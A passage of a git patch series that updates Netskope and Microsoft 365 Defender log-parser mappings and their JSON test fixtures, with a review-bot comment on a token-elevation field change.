@@ -11,7 +11,7 @@ "expected": { "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\"
:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", "event": { - "action": "block", + "action": "Browse", "category": [ "network" ], @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index d0d9ed304..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json index b05f61a9d..314e7d7e1 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_upload.json +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index 4c435b860..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": 
\"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": 
\"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "useralert", + "action": "Share", "category": [ "network" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, From 9264ef70512e299c783d05b43afb38dacd4c3431 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:25:08 +0100 Subject: [PATCH 77/84] Update Microsoft/microsoft-365-defender/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Microsoft/microsoft-365-defender/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index fc32171cd..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -267,7 +267,8 @@ stages:
 action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
 action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
 action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
 action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
 action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
 action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
From a4b94af6afa920ba08482254408c406c0ef90db6 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 11:57:27 +0100 Subject: [PATCH 78/84] Correction of overwrited test file --- .../tests/test_device_process_events_2.json | 114 ++++++------------ 1 file changed, 36 insertions(+), 78 deletions(-)
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cab75fb0a..9b0327128 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
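Review bot: Removing the `or json_event.message.properties.ProcessTokenElevation` fallback changes what `action.properties.InitiatingProcessTokenElevation` carries for any source record that exposes only `ProcessTokenElevation` — existing detection rules keyed on the initiating-process field would now see it empty and need to be migrated to the new `action.properties.ProcessTokenElevation`. The split itself is right (the two values describe different processes, as the `ProcessCreated` fixture in this series shows both fields side by side), but it is a field-semantics change that deserves a changelog line for rule authors. Minor style point: the new `action.properties.ProcessTokenElevation` mapping is inserted in the middle of the `InitiatingProcess*` group; placing it next to the other `Process*` mappings of this stage (e.g. `ProcessIntegrityLevel`, if it is mapped here) would keep the two groups readable. The enclosing `stages` entry starts and ends outside the hunk.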
@@ -1,6 +1,6 @@ { "input": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", 
@@ -9,7 +9,7 @@ } }, "expected": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", 